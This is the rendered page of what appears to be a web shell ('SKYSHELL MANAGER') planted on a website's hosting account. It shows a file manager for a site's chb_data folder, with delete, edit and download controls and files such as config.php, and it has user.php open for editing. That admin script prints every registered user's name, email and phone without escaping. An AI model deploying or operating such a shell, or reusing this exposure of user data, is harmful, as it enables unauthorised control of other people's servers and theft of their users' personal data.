📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
chb_data
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
10382.73 KB
0644
🗑️
⬇️
✏️
🔒
Editing: user.php
<?php include "header.php"; ?> <main id="main" class="main"> <div class="pagetitle"> <h1>All Users</h1> <nav> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="dashboard.php">Home</a></li> <li class="breadcrumb-item active">All Users</li> </ol> </nav> </div><!-- End Page Title --> <section class="section"> <div class="row"> <div class="col-lg-12"> <div class="card"> <div class="card-body"> <h5 class="card-title">Users DataTable</h5> <p>This contains every registered user details</p> <!-- Table with stripped rows --> <table class="table "> <thead> <tr> <th scope="col">#</th> <th scope="col">Name</th> <th scope="col">Email</th> <th scope="col">Phone</th> <th scope="col">Reg Date</th> </tr> </thead> <tbody> <?php //get the all unreviewed product $sqk = "SELECT all* from user"; $sqlp = mysqli_query($con,$sqk); $i=1; while($rowe = mysqli_fetch_array($sqlp)) { $neme = $rowe['name']; $mail = $rowe['email']; $per = $rowe['phone']; $der = $rowe['date']; echo ' <tr> <th scope="row">'.$i++.'</th> <td>'.$neme.'</td> <td>'.$mail.'</td> <td>'.$per.'</td> <td>'.$der.'</td> </tr>'; } ?> </tbody> </table> <!-- End Table with stripped rows --> </div> </div> </div> </div> </section> </main> <?php include "footer.php"; ?>
💾 Save Changes